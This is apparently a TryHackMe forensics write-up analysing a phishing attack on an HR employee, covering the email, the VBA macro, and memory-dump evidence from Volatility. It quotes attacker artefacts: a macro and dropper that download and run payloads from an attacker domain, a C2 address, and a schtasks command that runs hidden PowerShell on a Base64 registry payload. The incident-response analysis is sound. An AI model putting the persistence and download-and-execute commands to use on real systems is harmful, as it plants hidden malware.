Boogeyman 2 #
🏴 Platform: TryHackMe
🔬 Category: Forensics / DFIR
🟠 Difficulty: Medium
📅 Date: 2026-02-12
✍️ Author: tonton
⏱️ Reading time: ~4 min
Reconnaissance #
Quick Logistics LLC employee Maxine Beck (HR Specialist) received a phishing email with a malicious Word document disguised as a job application resume. The security team flagged suspicious commands on her workstation.
Artefacts provided:
- Phishing email (`.eml`)
- Memory dump of the victim's workstation (`.raw`)
Tools available on the VM:
- Volatility 3 — memory forensics
- olevba — VBA macro extraction
Exploitation #
Phase 1 — Phishing email analysis #
Reading the .eml headers reveals the sender, victim, and attachment:
From: westaylor23@outlook.com
To: maxine.beck@quicklogisticsorg.onmicrosoft.com
Subject: Resume - Application for Junior IT Analyst Role
Attachment: Resume_WesleyTaylor.doc
Extracting the attachment and computing the MD5:
```python
import email
import hashlib

# Parse the phishing email and hash every attachment it carries
with open('itrole.eml', 'rb') as f:
    msg = email.message_from_binary_file(f)

for part in msg.walk():
    fn = part.get_filename()
    if fn:
        data = part.get_payload(decode=True)  # transfer-decoded attachment bytes
        print(fn, hashlib.md5(data).hexdigest())
```
MD5: 52c4384a0b9e248b95804352ebec6c5b
Phase 2 — Malicious macro analysis #
```bash
olevba Resume_WesleyTaylor.doc
```
The VBA macro (AutoOpen) does the following:
- Downloads `update.png` from `https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png`
- Saves it as `C:\ProgramData\update.js`
- Executes it via `wscript.exe C:\ProgramData\update.js`
Phase 3 — Memory dump analysis: process tree #
```bash
vol -f memorydump.raw windows.pstree
```
The full attack chain in the process tree:
```text
explorer.exe (596)
└── OUTLOOK.EXE (1440)
    └── WINWORD.EXE (1124)        ← opens malicious .doc
        └── wscript.exe (4260)    ← macro executes update.js
            └── updater.exe (6216)    ← C2 binary
                └── conhost.exe (4464)
```
Confirming the command line:
```bash
vol -f memorydump.raw windows.cmdline --pid 4260
# wscript.exe C:\ProgramData\update.js

vol -f memorydump.raw windows.cmdline --pid 6216
# "C:\Windows\Tasks\updater.exe"
```
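Walking the chain by hand works for six processes; on a real dump it helps to do it programmatically. The following is an added example (not part of the writeup or of Volatility) that rebuilds the ancestry of a PID from pstree-style rows and flags an Office application that directly spawns a script host. The rows are constructed to mirror the PIDs above; the parent PID of explorer.exe is a placeholder.

```python
# Added example (not from the writeup): reconstruct a Volatility pstree-style
# ancestry chain and flag an Office process that spawns a script host.

# Constructed rows mirroring the PIDs in the writeup: (pid, ppid, image name).
# explorer.exe's parent PID (500) is a placeholder; the real value is not on the page.
SAMPLE_PROCESSES = [
    (596, 500, "explorer.exe"),
    (1440, 596, "OUTLOOK.EXE"),
    (1124, 1440, "WINWORD.EXE"),
    (4260, 1124, "wscript.exe"),
    (6216, 4260, "updater.exe"),
    (4464, 6216, "conhost.exe"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "powershell.exe", "cmd.exe", "mshta.exe"}


def build_index(rows):
    """Map pid -> (ppid, name) so a parent can be looked up directly."""
    return {pid: (ppid, name) for pid, ppid, name in rows}


def ancestry(index, pid):
    """Image names from the root (or first unknown parent) down to `pid`.
    The `seen` set guards against PID reuse producing a cycle in the dump."""
    chain, seen = [], set()
    while pid in index and pid not in seen:
        seen.add(pid)
        ppid, name = index[pid]
        chain.append(name)
        pid = ppid
    return chain[::-1]


def office_spawned_script_host(index):
    """(parent, child, child pid) triples where an Office app starts a script host."""
    hits = []
    for pid, (ppid, name) in index.items():
        if name.lower() not in SCRIPT_HOSTS or ppid not in index:
            continue
        parent = index[ppid][1]
        if parent.lower() in OFFICE_APPS:
            hits.append((parent, name, pid))
    return hits


if __name__ == "__main__":
    idx = build_index(SAMPLE_PROCESSES)
    print(" -> ".join(ancestry(idx, 6216)))
    print(office_spawned_script_host(idx))
```

On a real case, feed it the pid/ppid/name columns of `windows.pstree` output instead of the constructed rows.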
Phase 4 — Stage 2 payload URL #
Searching for the download URL inside update.js from the memory dump:
```bash
strings memorydump.raw | grep -i "boogeymanisback.lol/" | grep -v "\*\."
```
Reveals update.js contains:
```javascript
var url = "https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe"
```
Phase 5 — C2 connection #
```bash
vol -f memorydump.raw windows.netscan | grep -i updater
```
Multiple TCP connections from updater.exe (PID 6216) to 128.199.95.189:8080.
Phase 6 — Persistence mechanism #
```bash
strings memorydump.raw | grep -i "schtasks /create"
```
The attacker created a daily scheduled task:
```text
schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden -c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"'
```
This runs a hidden PowerShell every day at 09:00 that reads a Base64-encoded payload from the registry key HKCU:\Software\Microsoft\Windows\CurrentVersion\debug, decodes it as UTF-16 (`[Text.Encoding]::UNICODE`) and executes the result with `IEX`.
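Two things a responder wants from this artefact: the task's schedule and action pulled out of the command line with the suspicious traits flagged, and the registry blob decoded the same way the task decodes it (Base64 then UTF-16LE, which is what `[Text.Encoding]::UNICODE` means; decoding as UTF-8 leaves NUL bytes between characters). The following is an added example, not code from the writeup; the registry blob is a constructed stand-in because the real one is not on the page.

```python
# Added example (not from the writeup): triage a schtasks /Create command line
# recovered from memory and decode a registry-stored Base64 payload as the task does.
import base64
import re

# The persistence command as recovered from the dump in the writeup.
SCHTASKS_CMD = (r"""schtasks /Create /F /SC DAILY /ST 09:00 /TN Updater /TR """
                r"""'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NonI -W hidden """
                r"""-c "IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String("""
                r"""(gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug).debug)))"'""")

# Traits a defender would flag in the task's action (/TR) string.
SUSPICIOUS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "iex": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "registry_read": re.compile(r"\b(?:gp|Get-ItemProperty)\b[^)]*HK(?:CU|LM):", re.I),
}


def parse_schtasks_create(cmd):
    """Pull /SC, /ST, /TN and the quoted /TR action out of a schtasks /Create line."""
    fields = {}
    for flag in ("SC", "ST", "TN"):
        m = re.search(rf"/{flag}\s+(\S+)", cmd, re.I)
        if m:
            fields[flag] = m.group(1)
    m = re.search(r"""/TR\s+(['"])(.*)\1""", cmd, re.I | re.S)  # greedy: whole quoted action
    if m:
        fields["TR"] = m.group(2)
    return fields


def triage_task(cmd):
    """Parsed fields plus the list of suspicious traits found in the action."""
    fields = parse_schtasks_create(cmd)
    action = fields.get("TR", cmd)
    fields["indicators"] = [k for k, rx in SUSPICIOUS.items() if rx.search(action)]
    return fields


def decode_registry_payload(b64):
    """Base64 -> UTF-16LE, mirroring [Convert]::FromBase64String + UNICODE.GetString."""
    return base64.b64decode(b64).decode("utf-16-le")


# Constructed stand-in for the registry value; the real blob is not on the page.
SAMPLE_BLOB = base64.b64encode("Write-Host 'constructed payload'".encode("utf-16-le")).decode()
```

To decode the real value, export it from the hive (`reg query` on the host or Volatility's registry plugins on the dump) and pass the string to `decode_registry_payload`.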
Phase 7 — Email attachment path in memory #
```bash
vol -f memorydump.raw windows.filescan | grep -i "Resume_WesleyTaylor"
```
Full path: `C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc`
Answers #
| # | Question | Answer |
|---|---|---|
| 1 | Sender email | REDACTED |
| 2 | Victim email | REDACTED |
| 3 | Malicious document name | REDACTED |
| 4 | MD5 hash | REDACTED |
| 5 | Stage 2 download URL (macro) | REDACTED |
| 6 | Process executing stage 2 | REDACTED |
| 7 | Stage 2 full file path | REDACTED |
| 8 | Stage 2 PID | REDACTED |
| 9 | Stage 2 PPID | REDACTED |
| 10 | C2 binary download URL | REDACTED |
| 11 | C2 process PID | REDACTED |
| 12 | C2 binary full path | REDACTED |
| 13 | C2 IP:port | REDACTED |
| 14 | Attachment path (memory) | REDACTED |
| 15 | Persistence command | REDACTED |
Tools Used #
- Volatility 3 — `windows.pstree`, `windows.cmdline`, `windows.netscan`, `windows.filescan`, `windows.dumpfiles`
- olevba — VBA macro extraction from `.doc`
- strings + grep — raw memory string searching for URLs and schtasks commands
- Python 3 — email parsing and MD5 hashing
What Didn't Work #
- `vol windows.cmdline | grep schtasks` returned nothing — the schtasks command was not in a running process's cmdline, had to fall back to `strings` on the raw dump
- Same for finding the `update.exe` download URL — not visible via Volatility plugins, required raw string search
Lessons Learned #
- Volatility plugins don't catch everything — when structured plugins fail, `strings` + `grep` on the raw dump is a powerful fallback
- Follow the process tree — the parent-child chain (`OUTLOOK → WINWORD → wscript → updater`) tells the entire story of the attack
- Registry-based persistence is stealthy — the payload is stored as a Base64 blob in `HKCU:\Software\Microsoft\Windows\CurrentVersion\debug`, with a scheduled task triggering a hidden PowerShell to decode and execute it daily
- Kill chain mapping: phishing email → macro execution → JS dropper → C2 binary → persistence via schtasks + registry